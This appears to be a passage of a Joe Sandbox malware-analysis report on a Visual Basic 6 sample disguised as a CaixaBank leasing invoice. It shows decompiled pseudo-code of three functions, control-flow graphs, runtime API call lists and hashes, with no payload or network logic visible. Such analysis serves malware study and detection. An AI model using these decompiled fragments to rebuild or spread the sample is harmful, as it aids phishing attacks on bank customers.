        control_flow_graph 271 40c14b-40c194 __vbaChkstk 273 40c196-40c1ac __vbaNew2 271->273 274 40c1ae 271->274 275 40c1b5-40c1f0 __vbaObjSet 273->275 274->275 278 40c1f2-40c20a __vbaHresultCheckObj 275->278 279 40c20c 275->279 280 40c210-40c24b #561 __vbaFreeObj __vbaFreeVar 278->280 279->280 281 40c251-40c258 280->281 282 40c4cd-40c4f8 280->282 283 40c272 281->283 284 40c25a-40c270 __vbaNew2 281->284 286 40c279-40c2b4 __vbaObjSet 283->286 284->286 289 40c2d0 286->289 290 40c2b6-40c2ce __vbaHresultCheckObj 286->290 291 40c2d4-40c2db 289->291 290->291 292 40c2f8 291->292 293 40c2dd-40c2f6 __vbaNew2 291->293 294 40c302-40c343 __vbaObjSet 292->294 293->294 297 40c362 294->297 298 40c345-40c360 __vbaHresultCheckObj 294->298 299 40c369-40c383 __vbaLateIdCallLd 297->299 298->299 300 40c3a0 299->300 301 40c385-40c39e __vbaNew2 299->301 302 40c3aa-40c3e8 __vbaObjSet 300->302 301->302 305 40c404 302->305 306 40c3ea-40c402 __vbaHresultCheckObj 302->306 307 40c40b-40c485 __vbaFpI4 __vbaI4Var 305->307 306->307 309 40c4a4 307->309 310 40c487-40c4a2 __vbaHresultCheckObj 307->310 311 40c4ab-40c4c8 __vbaFreeObjList __vbaFreeVar 309->311 310->311 311->282
        C-Code - Quality: 57%
        			E0040C14B(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				char _v28;
        				char _v32;
        				char _v36;
        				char _v40;
        				char _v48;
        				char _v56;
        				char _v76;
        				char _v80;
        				intOrPtr* _v84;
        				signed int _v88;
        				void* _v92;
        				signed int _v96;
        				intOrPtr* _v100;
        				signed int _v104;
        				signed int _v108;
        				intOrPtr* _v120;
        				signed int _v124;
        				intOrPtr* _v128;
        				signed int _v132;
        				char _v136;
        				signed int _v140;
        				char _v144;
        				signed int _v148;
        				char _v152;
        				intOrPtr _v156;
        				signed int _v160;
        				signed int _v164;
        				signed int _v168;
        				char* _t122;
        				signed int _t126;
        				char* _t128;
        				char* _t129;
        				char* _t133;
        				signed int _t137;
        				char* _t141;
        				signed int _t145;
        				char* _t150;
        				signed int _t154;
        				char* _t155;
        				signed int _t158;
        				intOrPtr _t179;
        				void* _t183;
        				void* _t185;
        				intOrPtr _t186;
        				void* _t201;
        				void* _t202;
        				signed int _t203;
        
        				_t186 = _t185 - 0xc;
        				 *[fs:0x0] = _t186;
        				L00401240();
        				_v16 = _t186;
        				_v12 = 0x401178;
        				_v8 = 0;
        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401246, _t183);
        				if( *0x40e010 != 0) {
        					_v120 = 0x40e010;
        				} else {
        					_push(0x40e010);
        					_push(0x401f6c);
        					L00401360();
        					_v120 = 0x40e010;
        				}
        				_t122 =  &_v28;
        				L00401366();
        				_v84 = _t122;
        				_t126 =  *((intOrPtr*)( *_v84 + 0x120))(_v84,  &_v76, _t122,  *((intOrPtr*)( *((intOrPtr*)( *_v120)) + 0x30c))( *_v120));
        				asm("fclex");
        				_v88 = _t126;
        				if(_v88 >= 0) {
        					_v124 = _v124 & 0x00000000;
        				} else {
        					_push(0x120);
        					_push(0x402d5c);
        					_push(_v84);
        					_push(_v88);
        					L0040137E();
        					_v124 = _t126;
        				}
        				_v48 = _v76;
        				_v56 = 3;
        				_t128 =  &_v56;
        				_push(_t128);
        				L00401336();
        				_v92 =  ~(0 | _t128 != 0x0000ffff);
        				L00401378();
        				L00401372();
        				_t129 = _v92;
        				if(_t129 != 0) {
        					if( *0x40e010 != 0) {
        						_v128 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v128 = 0x40e010;
        					}
        					_t133 =  &_v28;
        					L00401366();
        					_v84 = _t133;
        					_t137 =  *((intOrPtr*)( *_v84 + 0x180))(_v84,  &_v76, _t133,  *((intOrPtr*)( *((intOrPtr*)( *_v128)) + 0x30c))( *_v128));
        					asm("fclex");
        					_v88 = _t137;
        					if(_v88 >= 0) {
        						_v132 = _v132 & 0x00000000;
        					} else {
        						_push(0x180);
        						_push(0x402d5c);
        						_push(_v84);
        						_push(_v88);
        						L0040137E();
        						_v132 = _t137;
        					}
        					if( *0x40e010 != 0) {
        						_v136 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v136 = 0x40e010;
        					}
        					_t141 =  &_v32;
        					L00401366();
        					_v92 = _t141;
        					_t145 =  *((intOrPtr*)( *_v92 + 0x100))(_v92,  &_v36, _t141,  *((intOrPtr*)( *((intOrPtr*)( *_v136)) + 0x30c))( *_v136));
        					asm("fclex");
        					_v96 = _t145;
        					if(_v96 >= 0) {
        						_v140 = _v140 & 0x00000000;
        					} else {
        						_push(0x100);
        						_push(0x402d5c);
        						_push(_v92);
        						_push(_v96);
        						L0040137E();
        						_v140 = _t145;
        					}
        					_push(0);
        					_push(0);
        					_push(_v36);
        					_push( &_v56);
        					L00401330();
        					if( *0x40e010 != 0) {
        						_v144 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v144 = 0x40e010;
        					}
        					_t179 =  *((intOrPtr*)( *_v144));
        					_t150 =  &_v40;
        					L00401366();
        					_v100 = _t150;
        					_t154 =  *((intOrPtr*)( *_v100 + 0x60))(_v100,  &_v80, _t150,  *((intOrPtr*)(_t179 + 0x310))( *_v144));
        					asm("fclex");
        					_v104 = _t154;
        					if(_v104 >= 0) {
        						_v148 = _v148 & 0x00000000;
        					} else {
        						_push(0x60);
        						_push(0x402d3c);
        						_push(_v100);
        						_push(_v104);
        						L0040137E();
        						_v148 = _t154;
        					}
        					L0040132A();
        					_t201 =  *0x401168;
        					_v132 = _t201;
        					asm("fild dword [ebp-0x4c]");
        					_v152 = _t201;
        					_t202 = _v152;
        					_v136 = _t202;
        					_t155 =  &_v56;
        					L00401324();
        					_v156 = _t155;
        					asm("fild dword [ebp-0x98]");
        					_v160 = _t202;
        					_t203 = _v160;
        					_v144 = _t203;
        					asm("fild dword [ebp-0x48]");
        					_v164 = _t203;
        					_v148 = _v164;
        					_t158 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t179, _t179, _t155, _t179, _t179, _t154);
        					asm("fclex");
        					_v108 = _t158;
        					if(_v108 >= 0) {
        						_v168 = _v168 & 0x00000000;
        					} else {
        						_push(0x2c8);
        						_push(0x402aa8);
        						_push(_a4);
        						_push(_v108);
        						L0040137E();
        						_v168 = _t158;
        					}
        					_push( &_v36);
        					_push( &_v40);
        					_push( &_v32);
        					_t129 =  &_v28;
        					_push(_t129);
        					_push(4);
        					L00401348();
        					L00401372();
        				}
        				asm("wait");
        				_push(0x40c4f9);
        				return _t129;
        			}





















































        0x0040c14e
        0x0040c15d
        0x0040c169
        0x0040c171
        0x0040c174
        0x0040c17b
        0x0040c18a
        0x0040c194
        0x0040c1ae
        0x0040c196
        0x0040c196
        0x0040c19b
        0x0040c1a0
        0x0040c1a5
        0x0040c1a5
        0x0040c1c9
        0x0040c1cd
        0x0040c1d2
        0x0040c1e1
        0x0040c1e7
        0x0040c1e9
        0x0040c1f0
        0x0040c20c
        0x0040c1f2
        0x0040c1f2
        0x0040c1f7
        0x0040c1fc
        0x0040c1ff
        0x0040c202
        0x0040c207
        0x0040c207
        0x0040c213
        0x0040c216
        0x0040c21d
        0x0040c220
        0x0040c221
        0x0040c231
        0x0040c238
        0x0040c240
        0x0040c245
        0x0040c24b
        0x0040c258
        0x0040c272
        0x0040c25a
        0x0040c25a
        0x0040c25f
        0x0040c264
        0x0040c269
        0x0040c269
        0x0040c28d
        0x0040c291
        0x0040c296
        0x0040c2a5
        0x0040c2ab
        0x0040c2ad
        0x0040c2b4
        0x0040c2d0
        0x0040c2b6
        0x0040c2b6
        0x0040c2bb
        0x0040c2c0
        0x0040c2c3
        0x0040c2c6
        0x0040c2cb
        0x0040c2cb
        0x0040c2db
        0x0040c2f8
        0x0040c2dd
        0x0040c2dd
        0x0040c2e2
        0x0040c2e7
        0x0040c2ec
        0x0040c2ec
        0x0040c31c
        0x0040c320
        0x0040c325
        0x0040c334
        0x0040c33a
        0x0040c33c
        0x0040c343
        0x0040c362
        0x0040c345
        0x0040c345
        0x0040c34a
        0x0040c34f
        0x0040c352
        0x0040c355
        0x0040c35a
        0x0040c35a
        0x0040c369
        0x0040c36b
        0x0040c36d
        0x0040c373
        0x0040c374
        0x0040c383
        0x0040c3a0
        0x0040c385
        0x0040c385
        0x0040c38a
        0x0040c38f
        0x0040c394
        0x0040c394
        0x0040c3ba
        0x0040c3c4
        0x0040c3c8
        0x0040c3cd
        0x0040c3dc
        0x0040c3df
        0x0040c3e1
        0x0040c3e8
        0x0040c404
        0x0040c3ea
        0x0040c3ea
        0x0040c3ec
        0x0040c3f1
        0x0040c3f4
        0x0040c3f7
        0x0040c3fc
        0x0040c3fc
        0x0040c411
        0x0040c417
        0x0040c41e
        0x0040c421
        0x0040c424
        0x0040c42a
        0x0040c431
        0x0040c434
        0x0040c438
        0x0040c43d
        0x0040c443
        0x0040c449
        0x0040c44f
        0x0040c456
        0x0040c459
        0x0040c45c
        0x0040c469
        0x0040c476
        0x0040c47c
        0x0040c47e
        0x0040c485
        0x0040c4a4
        0x0040c487
        0x0040c487
        0x0040c48c
        0x0040c491
        0x0040c494
        0x0040c497
        0x0040c49c
        0x0040c49c
        0x0040c4ae
        0x0040c4b2
        0x0040c4b6
        0x0040c4b7
        0x0040c4ba
        0x0040c4bb
        0x0040c4bd
        0x0040c4c8
        0x0040c4c8
        0x0040c4cd
        0x0040c4ce
        0x00000000

        APIs
        • __vbaChkstk.MSVBVM60(?,00401246), ref: 0040C169
        • __vbaNew2.MSVBVM60(00401F6C,0040E010,?,?,?,?,00401246), ref: 0040C1A0
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C1CD
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D5C,00000120), ref: 0040C202
        • #561.MSVBVM60(00000003), ref: 0040C221
        • __vbaFreeObj.MSVBVM60(00000003), ref: 0040C238
        • __vbaFreeVar.MSVBVM60(00000003), ref: 0040C240
        • __vbaNew2.MSVBVM60(00401F6C,0040E010,00000003), ref: 0040C264
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C291
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D5C,00000180), ref: 0040C2C6
        • __vbaNew2.MSVBVM60(00401F6C,0040E010), ref: 0040C2E7
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C320
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D5C,00000100), ref: 0040C355
        • __vbaLateIdCallLd.MSVBVM60(00000003,?,00000000,00000000), ref: 0040C374
        • __vbaNew2.MSVBVM60(00401F6C,0040E010,?,?,?,00401246), ref: 0040C38F
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C3C8
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D3C,00000060), ref: 0040C3F7
        • __vbaFpI4.MSVBVM60(00000000,?,00402D3C,00000060), ref: 0040C411
        • __vbaI4Var.MSVBVM60(?,?,?,00000000), ref: 0040C438
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401178,00402AA8,000002C8,?,?,?,?,?,00000000), ref: 0040C497
        • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C4BD
        • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,00401246), ref: 0040C4C8
        Memory Dump Source
        • Source File: 00000000.00000002.1172948703.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1172930676.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1172990240.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1173000183.0000000000410000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID: __vba$CheckHresult$FreeNew2$#561CallChkstkLateList
        • String ID:
        • API String ID: 2168923781-0
        • Opcode ID: c3b38214e916997f5dad13b2d2cdf2e6a0fd0c5db0d13b5a3a0650ce446b9ac3
        • Instruction ID: 311fc0e0beb8a1fbf54aa524a5b2400160cfb4df6b3b200cf5d75cc9e0996e43
        • Opcode Fuzzy Hash: c3b38214e916997f5dad13b2d2cdf2e6a0fd0c5db0d13b5a3a0650ce446b9ac3
        • Instruction Fuzzy Hash: 80B1F670900218EFDB10EFE1C889B9DBBB4BF08704F1085BAE545BB2A1D7B95995DF18
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 312 40d039-40d0b2 __vbaChkstk #527 __vbaStrMove __vbaStrCmp __vbaFreeStr 314 40d2a1-40d2de __vbaFreeStr 312->314 315 40d0b8-40d0bf 312->315 316 40d0c1-40d0d7 __vbaNew2 315->316 317 40d0d9 315->317 319 40d0e0-40d11b __vbaObjSet 316->319 317->319 322 40d137 319->322 323 40d11d-40d135 __vbaHresultCheckObj 319->323 324 40d13b-40d142 322->324 323->324 325 40d144-40d15a __vbaNew2 324->325 326 40d15c 324->326 327 40d163-40d19e __vbaObjSet 325->327 326->327 330 40d1a0-40d1b8 __vbaHresultCheckObj 327->330 331 40d1ba 327->331 332 40d1be-40d1c5 330->332 331->332 333 40d1c7-40d1dd __vbaNew2 332->333 334 40d1df 332->334 335 40d1e6-40d206 333->335 334->335 337 40d208-40d21d __vbaHresultCheckObj 335->337 338 40d21f 335->338 339 40d223-40d247 337->339 338->339 341 40d260 339->341 342 40d249-40d25e __vbaHresultCheckObj 339->342 343 40d264-40d29e __vbaStrMove __vbaFreeStrList __vbaFreeObjList 341->343 342->343 343->314
        C-Code - Quality: 53%
        			E0040D039(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				void* _v28;
        				char _v36;
        				char _v40;
        				signed int _v44;
        				char _v48;
        				char _v52;
        				char _v56;
        				void* _v60;
        				signed int _v64;
        				intOrPtr* _v68;
        				signed int _v72;
        				intOrPtr* _v76;
        				signed int _v80;
        				intOrPtr* _v84;
        				signed int _v88;
        				signed int _v100;
        				intOrPtr* _v104;
        				signed int _v108;
        				intOrPtr* _v112;
        				signed int _v116;
        				intOrPtr* _v120;
        				signed int _v124;
        				signed int _v128;
        				signed int _t93;
        				char* _t97;
        				char* _t101;
        				signed int _t105;
        				char* _t109;
        				signed int _t113;
        				signed int _t119;
        				signed int _t124;
        				void* _t145;
        				void* _t147;
        				intOrPtr _t148;
        
        				_t148 = _t147 - 0xc;
        				 *[fs:0x0] = _t148;
        				L00401240();
        				_v16 = _t148;
        				_v12 = 0x401228;
        				_v8 = 0;
        				_t93 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x68,  *[fs:0x0], 0x401246, _t145);
        				_push(0x402da4);
        				L004012D6();
        				L00401318();
        				_push(_t93);
        				_push(0x402dac);
        				L0040131E();
        				asm("sbb eax, eax");
        				_v60 =  ~( ~( ~_t93));
        				L00401342();
        				_t97 = _v60;
        				if(_t97 != 0) {
        					if( *0x40e010 != 0) {
        						_v104 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v104 = 0x40e010;
        					}
        					_t101 =  &_v48;
        					L00401366();
        					_v60 = _t101;
        					_t105 =  *((intOrPtr*)( *_v60 + 0x218))(_v60,  &_v36, _t101,  *((intOrPtr*)( *((intOrPtr*)( *_v104)) + 0x308))( *_v104));
        					asm("fclex");
        					_v64 = _t105;
        					if(_v64 >= 0) {
        						_v108 = _v108 & 0x00000000;
        					} else {
        						_push(0x218);
        						_push(0x402d4c);
        						_push(_v60);
        						_push(_v64);
        						L0040137E();
        						_v108 = _t105;
        					}
        					if( *0x40e010 != 0) {
        						_v112 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v112 = 0x40e010;
        					}
        					_t109 =  &_v52;
        					L00401366();
        					_v68 = _t109;
        					_t113 =  *((intOrPtr*)( *_v68 + 0x1c0))(_v68,  &_v40, _t109,  *((intOrPtr*)( *((intOrPtr*)( *_v112)) + 0x310))( *_v112));
        					asm("fclex");
        					_v72 = _t113;
        					if(_v72 >= 0) {
        						_v116 = _v116 & 0x00000000;
        					} else {
        						_push(0x1c0);
        						_push(0x402d3c);
        						_push(_v68);
        						_push(_v72);
        						L0040137E();
        						_v116 = _t113;
        					}
        					if( *0x40eb0c != 0) {
        						_v120 = 0x40eb0c;
        					} else {
        						_push(0x40eb0c);
        						_push(0x402d0c);
        						L00401360();
        						_v120 = 0x40eb0c;
        					}
        					_v76 =  *_v120;
        					_t119 =  *((intOrPtr*)( *_v76 + 0x4c))(_v76,  &_v56);
        					asm("fclex");
        					_v80 = _t119;
        					if(_v80 >= 0) {
        						_v124 = _v124 & 0x00000000;
        					} else {
        						_push(0x4c);
        						_push(0x402cfc);
        						_push(_v76);
        						_push(_v80);
        						L0040137E();
        						_v124 = _t119;
        					}
        					_v84 = _v56;
        					_t124 =  *((intOrPtr*)( *_v84 + 0x24))(_v84, _v36, _v40,  &_v44);
        					asm("fclex");
        					_v88 = _t124;
        					if(_v88 >= 0) {
        						_v128 = _v128 & 0x00000000;
        					} else {
        						_push(0x24);
        						_push(0x402db0);
        						_push(_v84);
        						_push(_v88);
        						L0040137E();
        						_v128 = _t124;
        					}
        					_v100 = _v44;
        					_v44 = _v44 & 0x00000000;
        					L00401318();
        					_push( &_v40);
        					_push( &_v36);
        					_push(2);
        					L004012D0();
        					_push( &_v56);
        					_push( &_v52);
        					_t97 =  &_v48;
        					_push(_t97);
        					_push(3);
        					L00401348();
        				}
        				asm("wait");
        				_push(0x40d2df);
        				L00401342();
        				return _t97;
        			}








































        0x0040d03c
        0x0040d04b
        0x0040d055
        0x0040d05d
        0x0040d060
        0x0040d067
        0x0040d076
        0x0040d079
        0x0040d07e
        0x0040d088
        0x0040d08d
        0x0040d08e
        0x0040d093
        0x0040d09a
        0x0040d0a0
        0x0040d0a7
        0x0040d0ac
        0x0040d0b2
        0x0040d0bf
        0x0040d0d9
        0x0040d0c1
        0x0040d0c1
        0x0040d0c6
        0x0040d0cb
        0x0040d0d0
        0x0040d0d0
        0x0040d0f4
        0x0040d0f8
        0x0040d0fd
        0x0040d10c
        0x0040d112
        0x0040d114
        0x0040d11b
        0x0040d137
        0x0040d11d
        0x0040d11d
        0x0040d122
        0x0040d127
        0x0040d12a
        0x0040d12d
        0x0040d132
        0x0040d132
        0x0040d142
        0x0040d15c
        0x0040d144
        0x0040d144
        0x0040d149
        0x0040d14e
        0x0040d153
        0x0040d153
        0x0040d177
        0x0040d17b
        0x0040d180
        0x0040d18f
        0x0040d195
        0x0040d197
        0x0040d19e
        0x0040d1ba
        0x0040d1a0
        0x0040d1a0
        0x0040d1a5
        0x0040d1aa
        0x0040d1ad
        0x0040d1b0
        0x0040d1b5
        0x0040d1b5
        0x0040d1c5
        0x0040d1df
        0x0040d1c7
        0x0040d1c7
        0x0040d1cc
        0x0040d1d1
        0x0040d1d6
        0x0040d1d6
        0x0040d1eb
        0x0040d1fa
        0x0040d1fd
        0x0040d1ff
        0x0040d206
        0x0040d21f
        0x0040d208
        0x0040d208
        0x0040d20a
        0x0040d20f
        0x0040d212
        0x0040d215
        0x0040d21a
        0x0040d21a
        0x0040d226
        0x0040d23b
        0x0040d23e
        0x0040d240
        0x0040d247
        0x0040d260
        0x0040d249
        0x0040d249
        0x0040d24b
        0x0040d250
        0x0040d253
        0x0040d256
        0x0040d25b
        0x0040d25b
        0x0040d267
        0x0040d26a
        0x0040d274
        0x0040d27c
        0x0040d280
        0x0040d281
        0x0040d283
        0x0040d28e
        0x0040d292
        0x0040d293
        0x0040d296
        0x0040d297
        0x0040d299
        0x0040d29e
        0x0040d2a1
        0x0040d2a2
        0x0040d2d9
        0x0040d2de

        APIs
        • __vbaChkstk.MSVBVM60(?,00401246), ref: 0040D055
        • #527.MSVBVM60(00402DA4,?,?,?,?,00401246), ref: 0040D07E
        • __vbaStrMove.MSVBVM60(00402DA4,?,?,?,?,00401246), ref: 0040D088
        • __vbaStrCmp.MSVBVM60(00402DAC,00000000,00402DA4,?,?,?,?,00401246), ref: 0040D093
        • __vbaFreeStr.MSVBVM60(00402DAC,00000000,00402DA4,?,?,?,?,00401246), ref: 0040D0A7
        • __vbaNew2.MSVBVM60(00401F6C,0040E010,00402DAC,00000000,00402DA4,?,?,?,?,00401246), ref: 0040D0CB
        • __vbaObjSet.MSVBVM60(00402DAC,00000000), ref: 0040D0F8
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D4C,00000218), ref: 0040D12D
        • __vbaNew2.MSVBVM60(00401F6C,0040E010), ref: 0040D14E
        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D17B
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D3C,000001C0), ref: 0040D1B0
        • __vbaNew2.MSVBVM60(00402D0C,0040EB0C), ref: 0040D1D1
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402CFC,0000004C), ref: 0040D215
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402DB0,00000024), ref: 0040D256
        • __vbaStrMove.MSVBVM60(00000000,?,00402DB0,00000024), ref: 0040D274
        • __vbaFreeStrList.MSVBVM60(00000002,?,00402DA4), ref: 0040D283
        • __vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,?,00401246), ref: 0040D299
        • __vbaFreeStr.MSVBVM60(0040D2DF,00402DAC,00000000,00402DA4,?,?,?,?,00401246), ref: 0040D2D9
        Memory Dump Source
        • Source File: 00000000.00000002.1172948703.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1172930676.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1172990240.000000000040E000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1173000183.0000000000410000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_CaixaBank Payments Consumer Factura Leasing del 22 DE FEBRERO DE 2021 .jbxd
        Similarity
        • API ID: __vba$CheckFreeHresult$New2$ListMove$#527Chkstk
        • String ID:
        • API String ID: 966294641-0
        • Opcode ID: cbb27bcbaa322db0baa773ed34c9c049cb2768874aa8a65618a52b485ebc7ca4
        • Instruction ID: f3e2838d0821f10ea551ada5bd48127283f588123a8a2d6bc27b7e3ddb127fab
        • Opcode Fuzzy Hash: cbb27bcbaa322db0baa773ed34c9c049cb2768874aa8a65618a52b485ebc7ca4
        • Instruction Fuzzy Hash: D281D371D00208AFDB10EFE5C945BDDBBB4BF08704F20446AE502BB2A1DBB96955DB58
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 47%
        			E0040C8D9(void* __ebx, void* __edi, void* __esi, void* _a12, signed int* _a52) {
        				intOrPtr _v12;
        				intOrPtr _v16;
        				void* _v28;
        				void* _v44;
        				signed int _v64;
        				void* _v68;
        				char _v84;
        				char _v100;
        				char _v116;
        				char _v132;
        				intOrPtr _v156;
        				char _v164;
        				intOrPtr _v172;
        				char _v180;
        				void* _v184;
        				signed int _v188;
        				intOrPtr* _v192;
        				signed int _v196;
        				intOrPtr _v208;
        				intOrPtr* _v212;
        				signed int _v216;
        				signed int _v220;
        				char* _t72;
        				short _t76;
        				signed int _t81;
        				signed int _t87;
        				signed int _t93;
        				void* _t108;
        				intOrPtr _t109;
        
        				_t109 = _t108 - 0xc;
        				_push(0x401246);
        				_push( *[fs:0x0]);
        				 *[fs:0x0] = _t109;
        				L00401240();
        				_v16 = _t109;
        				_v12 = 0x4011a8;
        				L00401300();
        				 *_a52 =  *_a52 & 0x00000000;
        				_push( &_v84);
        				L004012FA();
        				_push( &_v100);
        				L004012FA();
        				_v156 = 1;
        				_v164 = 2;
        				_push(1);
        				_push(1);
        				_push( &_v100);
        				_push( &_v164);
        				_t72 =  &_v116;
        				_push(_t72);
        				L004012EE();
        				_push(_t72);
        				_push( &_v84);
        				_push(0x402d7c);
        				_push( &_v132);
        				L004012F4();
        				_v172 = 1;
        				_v180 = 0x8002;
        				_push( &_v132);
        				_t76 =  &_v180;
        				_push(_t76);
        				L0040135A();
        				_v184 = _t76;
        				_push( &_v132);
        				_push( &_v116);
        				_push( &_v84);
        				_push( &_v100);
        				_push(4);
        				L00401354();
        				_t81 = _v184;
        				if(_t81 != 0) {
        					if( *0x40eb0c != 0) {
        						_v212 = 0x40eb0c;
        					} else {
        						_push(0x40eb0c);
        						_push(0x402d0c);
        						L00401360();
        						_v212 = 0x40eb0c;
        					}
        					_v184 =  *_v212;
        					_t87 =  *((intOrPtr*)( *_v184 + 0x1c))(_v184,  &_v68);
        					asm("fclex");
        					_v188 = _t87;
        					if(_v188 >= 0) {
        						_v216 = _v216 & 0x00000000;
        					} else {
        						_push(0x1c);
        						_push(0x402cfc);
        						_push(_v184);
        						_push(_v188);
        						L0040137E();
        						_v216 = _t87;
        					}
        					_v192 = _v68;
        					_v156 = 0x80020004;
        					_v164 = 0xa;
        					L00401240();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_t93 =  *((intOrPtr*)( *_v192 + 0x5c))(_v192, 0x10,  &_v64);
        					asm("fclex");
        					_v196 = _t93;
        					if(_v196 >= 0) {
        						_v220 = _v220 & 0x00000000;
        					} else {
        						_push(0x5c);
        						_push(0x402d1c);
        						_push(_v192);
        						_push(_v196);
        						L0040137E();
        						_v220 = _t93;
        					}
        					_t81 = _v64;
        					_v208 = _t81;
        					_v64 = _v64 & 0x00000000;
        					L00401318();
        					L00401378();
        				}
        				_push(0x40cb45);
        				L00401342();
        				L00401372();
        				return _t81;
        			}
































        0x0040c8dc
        0x0040c8df
        0x0040c8ea
        0x0040c8eb
        0x0040c8f7
        0x0040c8ff
        0x0040c902
        0x0040c90f
        0x0040c917
        0x0040c91d
        0x0040c91e
        0x0040c926
        0x0040c927
        0x0040c92c
        0x0040c936
        0x0040c940
        0x0040c942
        0x0040c947
        0x0040c94e
        0x0040c94f
        0x0040c952
        0x0040c953
        0x0040c958
        0x0040c95c
        0x0040c95d
        0x0040c965
        0x0040c966
        0x0040c96b
        0x0040c975
        0x0040c982
        0x0040c983
        0x0040c989
        0x0040c98a
        0x0040c98f
        0x0040c999
        0x0040c99d
        0x0040c9a1
        0x0040c9a5
        0x0040c9a6
        0x0040c9a8
        0x0040c9b0
        0x0040c9b9
        0x0040c9c6
        0x0040c9e3
        0x0040c9c8
        0x0040c9c8
        0x0040c9cd
        0x0040c9d2
        0x0040c9d7
        0x0040c9d7
        0x0040c9f5
        0x0040ca0d
        0x0040ca10
        0x0040ca12
        0x0040ca1f
        0x0040ca41
        0x0040ca21
        0x0040ca21
        0x0040ca23
        0x0040ca28
        0x0040ca2e
        0x0040ca34
        0x0040ca39
        0x0040ca39
        0x0040ca4b
        0x0040ca51
        0x0040ca5b
        0x0040ca6c
        0x0040ca79
        0x0040ca7a
        0x0040ca7b
        0x0040ca7c
        0x0040ca8b
        0x0040ca8e
        0x0040ca90
        0x0040ca9d
        0x0040cabf
        0x0040ca9f
        0x0040ca9f
        0x0040caa1
        0x0040caa6
        0x0040caac
        0x0040cab2
        0x0040cab7
        0x0040cab7
        0x0040cac6
        0x0040cac9
        0x0040cacf
        0x0040cadc
        0x0040cae4
        0x0040cae4
        0x0040cae9
        0x0040cb37
        0x0040cb3f
        0x0040cb44

        APIs
        • __vbaChkstk.MSVBVM60(?,00401246), ref: 0040C8F7
        • __vbaVarDup.MSVBVM60(?,?,?,?,00401246), ref: 0040C90F
        • #610.MSVBVM60(?,?,?,?,?,00401246), ref: 0040C91E
        • #610.MSVBVM60(?,?,?,?,?,?,00401246), ref: 0040C927
        • __vbaVarAdd.MSVBVM60(?,00000002,?,00000001,00000001), ref: 0040C953
        • #662.MSVBVM60(?,00402D7C,?,00000000,?,00000002,?,00000001,00000001), ref: 0040C966
        • __vbaVarTstNe.MSVBVM60(00008002,?,?,00402D7C,?,00000000,?,00000002,?,00000001,00000001), ref: 0040C98A
        • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,00008002,?,?,00402D7C,?,00000000,?,00000002,?,00000001,00000001), ref: 0040C9A8
        • __vbaNew2.MSVBVM60(00402D0C,0040EB0C,?,?,?,?,00401246), ref: 0040C9D2
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402CFC,0000001C), ref: 0040CA34
        • __vbaChkstk.MSVBVM60(?), ref: 0040CA6C
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402D1C,0000005C), ref: 0040CAB2
        • __vbaStrMove.MSVBVM60(00000000,?,00402D1C,0000005C), ref: 0040CADC
        • __vbaFreeObj.MSVBVM60(00000000,?,00402D1C,0000005C), ref: 0040CAE4
        • __vbaFreeStr.MSVBVM60(0040CB45,?,?,?,?,00401246), ref: 0040CB37
        • __vbaFreeVar.MSVBVM60(0040CB45,?,?,?,?,00401246), ref: 0040CB3F
        Memory Dump Source
        • Source File: 00000000.00000002.1172948703.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1172930676.0000000000400000.00000002.00020000.sdmp Download File
